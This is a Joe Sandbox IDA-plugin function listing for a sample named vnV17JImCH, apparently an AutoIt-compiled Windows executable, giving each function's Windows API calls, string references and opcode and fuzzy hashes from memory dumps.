Instruction ID: 57d0950b2f9e5c1725ccb7d0b0fa4c52842a0efbb7afca7bf8748339c59f83e9
Opcode Fuzzy Hash: 31f2289318f722fbd29bea82ba080f0d7a7778d1d8c557b9f46616c2c817c087
Instruction Fuzzy Hash: 1511A1726002049FDB10DF29C845A2AF7E8FF89320F00861DF9A9DB291DB34AC05DF81

Function 00F0A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F19468,?,00F2FB84,?), ref: 00F0A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F19468,?,00F2FB84,?), ref: 00F0A0A9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b76f719530313ff0565bafa52d3c9346bf0bbd7b02dfd3d6b35c224e58ef84f4
Instruction ID: 506de9fb68a7d43c8e3c26ae33e204606650f4ae4c253ea454835b6a6ad99232
Opcode Fuzzy Hash: b76f719530313ff0565bafa52d3c9346bf0bbd7b02dfd3d6b35c224e58ef84f4
Instruction Fuzzy Hash: 7CF0A73651532DBBDB219FA4CC48FEA776CFF09761F004166F909D7181D6309944DBA1

Function 00EF81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EF8309), ref: 00EF81E0
CloseHandle.KERNEL32(?,?,00EF8309), ref: 00EF81F2

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 5f2f152e619c1e49d75124939333954d878e061db40dd7cd37ff264723c99580
Instruction ID: 908984a034a2e2b949cd2ee81ba9714c198971d87e81d38bf9aeb9dd229ff9be
Opcode Fuzzy Hash: 5f2f152e619c1e49d75124939333954d878e061db40dd7cd37ff264723c99580
Instruction Fuzzy Hash: 97E08C32010610EFEB212B20EC08E737BFAEF04310B10993DF8A6C0430CB22AC92EB10

Function 00ECA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EC8D57,?,?,?,00000001), ref: 00ECA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ECA163

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0d898276d7246eb273f654ac0add4876aea80c387b3f1a77fcd27d6d073a0642
Instruction ID: 074aea43a366ff48fecefa8b878110923fd167b6337de94bd2c4712d037d9c79
Opcode Fuzzy Hash: 0d898276d7246eb273f654ac0add4876aea80c387b3f1a77fcd27d6d073a0642
Instruction Fuzzy Hash: 51B0923106420CEBCA106B91EC09B883F78EB44AA2F404030F60D84060CB625856AA91

Function 00EAE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00EE3E62

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 4c030bb47f495192cb8e2a155b5c7c7a098e37eb6a0bde58f63aa2efb28b74e4
Instruction ID: 43741513dc4fc437bd8e698beb39f4ffb761b427376ce858b45c36ddad6f717b
Opcode Fuzzy Hash: 4c030bb47f495192cb8e2a155b5c7c7a098e37eb6a0bde58f63aa2efb28b74e4
Instruction Fuzzy Hash: 88A25975A00209CFCB24CF98C890AAAB7B2FF5A314F249069E915BF351D775BD42CB91

Function 00ECF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b315eacc0268aa20e3b50a5872032d12b83c6cf51d31488e15e775daac0166a
Instruction ID: f638274c3088252350dd8955744b0e75d4f6cb7f105a90cfe60796890043d173
Opcode Fuzzy Hash: 7b315eacc0268aa20e3b50a5872032d12b83c6cf51d31488e15e775daac0166a
Instruction Fuzzy Hash: 66323562D29F054DD7239634C932336A25AAFF73D4F14E73BE819B5AA9EB39C4835100

Function 00ED242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a930412abc3a130fdbe209bc4e23cdaaf5ebcfaacc1f8ab4594ddca1dc4984b
Instruction ID: 2dfcfa8169c700928009f184e4592cb988686477e6f0d4e9d8851006537a0952
Opcode Fuzzy Hash: 0a930412abc3a130fdbe209bc4e23cdaaf5ebcfaacc1f8ab4594ddca1dc4984b
Instruction Fuzzy Hash: ECB1F021D2AF444DD323963A8831336B65DAFBB2E5F51D71BFC6670E22EB2285835141

Function 016F2000 Relevance: 1.6, Strings: 1, Instructions: 363COMMON

Download Yara Rule

Strings

%, xrefs: 016F27A6

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 8d4a72fa592917cbe9d759b84e838198a1d9e2fb9a0abf89f6854e5e48a747f3
Instruction ID: 61966e9fe915cb75b6f8bc425176e0066e38f61ec6a298eb65a3e62b0a2e18b0
Opcode Fuzzy Hash: 8d4a72fa592917cbe9d759b84e838198a1d9e2fb9a0abf89f6854e5e48a747f3
Instruction Fuzzy Hash: 8912FD709187A88AEB24CF64C8447CDBBB2FF59300F5091EDC54CAB261E7765A85CF0A

Function 00F08889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00F0889B

Part of subcall function 00EC520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F08F6E,00000000,?,?,?,?,00F0911F,00000000,?), ref: 00EC5213
Part of subcall function 00EC520A: __aulldiv.LIBCMT ref: 00EC5233

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 82b5b7fbcd598d602b8f57fd9306d5456a74f5d1544fb7b6c18e5afd2a0a2b26
Instruction ID: c7169a46f9ce9b90880593f72becac9621ec3dbf1717153e2cfeedcfff407a82
Opcode Fuzzy Hash: 82b5b7fbcd598d602b8f57fd9306d5456a74f5d1544fb7b6c18e5afd2a0a2b26
Instruction Fuzzy Hash: 0021B732A35510CBC729CF25D841A51B3E1EFA5321B688E6CD0F5CB2D0CA75BD05EB94

Function 00EF87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00EF8389), ref: 00EF87D1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 8d4491484d67813072e1f53d1686593edf77d5ca8ab0ede16ce2d4f9b61168ab
Instruction ID: 3a725ad8acb63045297e14784ada13cace4c3dfbd5f233bc84e45f0893d42d37
Opcode Fuzzy Hash: 8d4491484d67813072e1f53d1686593edf77d5ca8ab0ede16ce2d4f9b61168ab
Instruction Fuzzy Hash: 91D05E3226050EABEF018EA4DD01EAE3B69EB04B01F408121FE15D50A1C775D835AB60

Function 00ECA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00ECA12A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 78c5af4211b9017ad38465b9a9d2a26f350227148a8eff80e10e7b55521e4ea8
Instruction ID: 2bee322eb49ac5ad72da68e7ce693dc0b6eb3b3aa8ffb089904827a11343b64b
Opcode Fuzzy Hash: 78c5af4211b9017ad38465b9a9d2a26f350227148a8eff80e10e7b55521e4ea8
Instruction Fuzzy Hash: 7FA0113002020CEB8A002B82EC08888BFACEA002A0B008030F80C800228B32A822AA80

Function 00EB8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32887d505d2e7aaa5c667b3ebd63ce55b1ddb56dd0c0b6060aa8df20667f90dc
Instruction ID: da851de2ba2218ee70a41317257ff077f16c5817d9e40fa7bdccb33a79cd0d37
Opcode Fuzzy Hash: 32887d505d2e7aaa5c667b3ebd63ce55b1ddb56dd0c0b6060aa8df20667f90dc
Instruction Fuzzy Hash: 5922373150450ACBDF288A58C5947FE77B5FB41308F28A06BDB46BB6A2DB70ED81D741

Function 00EC21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: be6c5e8678d6fb526d4010222adde963e22729d8ec7e5ed657fc2838b011d1bd
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 75C10A322051930AEF1D46398630A3EFFA05EA37B631A239DD4B3EB0D5EE11C976D650

Function 00EC25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: bc489d85fc574f1943d52863e0c1747ae2c64fedf1bfb3b971481ba24ac04c02
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 4FC1F83320515309EF2D4639C630A3EBEA15E937B631A279DD4B3EB0C5EE21C976D660

Function 00EC1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 38536e2c555ae6c5236e815f26e0c46b91d495b7f468b7e0c21659903438619c
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: A2C1D73220519309EF1D46398630A3EFEA15EA37B631A27DDD4B3EB1C2EE11C976C650

Function 016F5730 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 5638c5564d0a05526ecce60783f5233e97ed6aea988c293b4062fa4d78570b6d
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: EC41D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50

Function 016F55C0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: d4596bfdffa848b5fa2d242b03b91e0d23cbed3a67e3f3de01702746a0f5bfdb
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: E601A478A01109EFCB44DF98C5909AEF7F6FF48310F208599D919A7301D730AE41DB80

Function 016F5620 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 4c2c3d9ad930ce6fa7fe61db542e084276defae1929df9caafdacad1e23126fd
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 56019278A01209EFCB44DF98D5909AEF7B6FB48310F208699D919A7311D730AE41DB80

Function 016F3F70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2361212309.00000000016F2000.00000040.00000020.00020000.00000000.sdmp, Offset: 016F2000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f2000_vnV17JImCH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00F17806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F1785B
DeleteObject.GDI32(00000000), ref: 00F1786D
DestroyWindow.USER32 ref: 00F1787B
GetDesktopWindow.USER32 ref: 00F17895
GetWindowRect.USER32(00000000), ref: 00F1789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F179DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F179ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17A35
GetClientRect.USER32(00000000,?), ref: 00F17A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F17A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17ABB
GlobalLock.KERNEL32(00000000), ref: 00F17AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17AD3
GlobalUnlock.KERNEL32(00000000), ref: 00F17ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17AE3
GlobalFree.KERNEL32(00000000), ref: 00F17AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F32CAC,00000000), ref: 00F17B16
GlobalFree.KERNEL32(00000000), ref: 00F17B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F17B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F17B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F17D7A

Strings

, xrefs: 00F17D00
DISPLAY, xrefs: 00F17BDD
static, xrefs: 00F17A75, 00F17BCC
AutoIt v3, xrefs: 00F17A2D

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 76389b1a643f60be9a576708c3782d98ea52bfbc0c6974277912138a416a28a2
Instruction ID: 3b1332e9f0fdff87eb856b60ff3b9d8e23f60bad9a9d41e066d75b272d249ea5
Opcode Fuzzy Hash: 76389b1a643f60be9a576708c3782d98ea52bfbc0c6974277912138a416a28a2
Instruction Fuzzy Hash: 0F02BE71910208EFCB14DFA4DC89EAE7BB9FF49310F108128F915AB2A1C730AD45EB60

Function 00F2356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00F2F910), ref: 00F23627
IsWindowVisible.USER32(?), ref: 00F2364B

Strings

GETCURRENTCOL, xrefs: 00F23928
CURRENTTAB, xrefs: 00F236BD
GETLINECOUNT, xrefs: 00F238C6
ISVISIBLE, xrefs: 00F23637
DELSTRING, xrefs: 00F23749
GETLINE, xrefs: 00F2399B
ISENABLED, xrefs: 00F2366B
ADDSTRING, xrefs: 00F23716
SELECTSTRING, xrefs: 00F23806
HIDEDROPDOWN, xrefs: 00F23700
SETCURRENTSELECTION, xrefs: 00F237B6
TABRIGHT, xrefs: 00F2369D
UNCHECK, xrefs: 00F23883
SHOWDROPDOWN, xrefs: 00F236E0
TABLEFT, xrefs: 00F23687
EDITPASTE, xrefs: 00F2395F
CHECK, xrefs: 00F2386D
GETCURRENTSELECTION, xrefs: 00F237E3
FINDSTRING, xrefs: 00F23776
ISCHECKED, xrefs: 00F23839
GETCURRENTLINE, xrefs: 00F238ED
GETSELECTED, xrefs: 00F238A3
SENDCOMMANDID, xrefs: 00F239DA

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
